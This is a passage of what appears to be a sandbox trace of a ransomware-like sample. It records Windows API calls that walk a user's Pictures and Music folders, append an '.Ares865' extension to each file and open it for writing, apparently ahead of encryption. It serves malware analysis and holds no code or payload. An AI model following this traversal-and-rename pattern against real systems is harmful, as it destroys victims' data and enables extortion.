lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z" [0094.264] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW" [0094.264] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl" [0094.267] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp" [0094.267] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk" [0094.267] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\doxPgk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\doxPgk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\doxPgk" [0094.268] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music" [0094.268] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\desktop.ini.Ares865") returned 71 [0094.268] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0094.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.269] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=504) returned 1 [0094.272] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\FXIcCURBJcUt.mp3.Ares865") returned 76 [0094.272] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\FXIcCURBJcUt.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\fxiccurbjcut.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\FXIcCURBJcUt.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\fxiccurbjcut.mp3.ares865"), dwFlags=0x1) returned 1 [0094.273] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\FXIcCURBJcUt.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\fxiccurbjcut.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.273] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=70657) returned 1 [0094.277] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\KMBQAGcw5RmmaX6C.m4a.Ares865") returned 80 [0094.277] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\KMBQAGcw5RmmaX6C.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\kmbqagcw5rmmax6c.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\KMBQAGcw5RmmaX6C.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\kmbqagcw5rmmax6c.m4a.ares865"), dwFlags=0x1) returned 1 [0094.278] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\KMBQAGcw5RmmaX6C.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\kmbqagcw5rmmax6c.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.278] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21661) returned 1 [0094.281] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\MAoaE3eiP.m4a.Ares865") returned 73 [0094.281] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\MAoaE3eiP.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\maoae3eip.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\MAoaE3eiP.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\maoae3eip.m4a.ares865"), dwFlags=0x1) returned 1 [0094.282] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\MAoaE3eiP.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\maoae3eip.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.282] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=80955) returned 1 [0094.287] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\Mi-q8kOQRLuri7c.m4a.Ares865") returned 79 [0094.287] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\Mi-q8kOQRLuri7c.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\mi-q8koqrluri7c.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\Mi-q8kOQRLuri7c.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\mi-q8koqrluri7c.m4a.ares865"), dwFlags=0x1) returned 1 [0094.287] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\Mi-q8kOQRLuri7c.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\mi-q8koqrluri7c.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.288] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24275) returned 1 [0094.291] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\OGummS-In83Itt_NRuzj.mp3.Ares865") returned 84 [0094.291] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\OGummS-In83Itt_NRuzj.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\ogumms-in83itt_nruzj.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\OGummS-In83Itt_NRuzj.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\ogumms-in83itt_nruzj.mp3.ares865"), dwFlags=0x1) returned 1 [0094.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\OGummS-In83Itt_NRuzj.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\ogumms-in83itt_nruzj.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.292] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=96195) returned 1 [0094.297] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\p3N6PHiQ7xVd.mp3.Ares865") returned 76 [0094.297] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\p3N6PHiQ7xVd.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\p3n6phiq7xvd.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\p3N6PHiQ7xVd.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\p3n6phiq7xvd.mp3.ares865"), dwFlags=0x1) returned 1 [0094.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\p3N6PHiQ7xVd.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\p3n6phiq7xvd.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.298] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=73374) returned 1 [0094.303] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\PCQx3ElgYqZpM.mp3.Ares865") returned 77 [0094.303] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\PCQx3ElgYqZpM.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pcqx3elgyqzpm.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\PCQx3ElgYqZpM.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pcqx3elgyqzpm.mp3.ares865"), dwFlags=0x1) returned 1 [0094.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\PCQx3ElgYqZpM.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pcqx3elgyqzpm.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.304] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19220) returned 1 [0094.307] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\rWa_n_8R.wav.Ares865") returned 72 [0094.307] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\rWa_n_8R.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\rwa_n_8r.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\rWa_n_8R.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\rwa_n_8r.wav.ares865"), dwFlags=0x1) returned 1 [0094.307] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\rWa_n_8R.wav.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\rwa_n_8r.wav.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.308] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65725) returned 1 [0094.314] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\VfG5CSjkXsu GPC.m4a.Ares865") returned 79 [0094.314] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\VfG5CSjkXsu GPC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\vfg5csjkxsu gpc.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\VfG5CSjkXsu GPC.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\vfg5csjkxsu gpc.m4a.ares865"), dwFlags=0x1) returned 1 [0094.315] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\VfG5CSjkXsu GPC.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\vfg5csjkxsu gpc.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.315] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18976) returned 1 [0094.318] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR" [0094.318] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\qvtalUwM.m4a.Ares865") returned 77 [0094.318] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\qvtalUwM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\qvtaluwm.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\qvtalUwM.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\qvtaluwm.m4a.ares865"), dwFlags=0x1) returned 1 [0094.320] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\qvtalUwM.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\qvtaluwm.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.320] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65261) returned 1 [0094.325] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0" [0094.326] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\90t2WXB7NJL5LRMqful.m4a.Ares865") returned 100 [0094.326] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\90t2WXB7NJL5LRMqful.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\90t2wxb7njl5lrmqful.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\90t2WXB7NJL5LRMqful.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\90t2wxb7njl5lrmqful.m4a.ares865"), dwFlags=0x1) returned 1 [0094.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\90t2WXB7NJL5LRMqful.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\90t2wxb7njl5lrmqful.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.327] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=64191) returned 1 [0094.331] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\9jqiIa0sg.mp3.Ares865") returned 90 [0094.331] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\9jqiIa0sg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\9jqiia0sg.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\9jqiIa0sg.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\9jqiia0sg.mp3.ares865"), dwFlags=0x1) returned 1 [0094.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\9jqiIa0sg.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\9jqiia0sg.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.333] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=83313) returned 1 [0094.338] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\iA13mBpxYJdfy8I.m4a.Ares865") returned 96 [0094.338] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\iA13mBpxYJdfy8I.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\ia13mbpxyjdfy8i.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\iA13mBpxYJdfy8I.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\ia13mbpxyjdfy8i.m4a.ares865"), dwFlags=0x1) returned 1 [0094.339] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\iA13mBpxYJdfy8I.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\ia13mbpxyjdfy8i.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.339] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31578) returned 1 [0094.342] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl" [0094.342] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl\\0lMA.mp3.Ares865") returned 103 [0094.342] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl\\0lMA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\hc0skyi n78jtm2xl\\0lma.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl\\0lMA.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\hc0skyi n78jtm2xl\\0lma.mp3.ares865"), dwFlags=0x1) returned 1 [0094.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl\\0lMA.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\hc0skyi n78jtm2xl\\0lma.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.352] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=53116) returned 1 [0094.356] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl\\rveuiNfTChpM5Jp.mp3.Ares865") returned 114 [0094.356] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl\\rveuiNfTChpM5Jp.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\hc0skyi n78jtm2xl\\rveuinftchpm5jp.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl\\rveuiNfTChpM5Jp.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\hc0skyi n78jtm2xl\\rveuinftchpm5jp.mp3.ares865"), dwFlags=0x1) returned 1 [0094.357] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\pZcR\\X vjbeaqUS0\\HC0sKyi n78JtM2xl\\rveuiNfTChpM5Jp.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\pzcr\\x vjbeaqus0\\hc0skyi n78jtm2xl\\rveuinftchpm5jp.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.357] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=66783) returned 1 [0094.361] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd" [0094.362] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\dILY.m4a.Ares865") returned 73 [0094.362] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Music\\0tvd\\dILY.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my music\\0tvd\\dily.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My 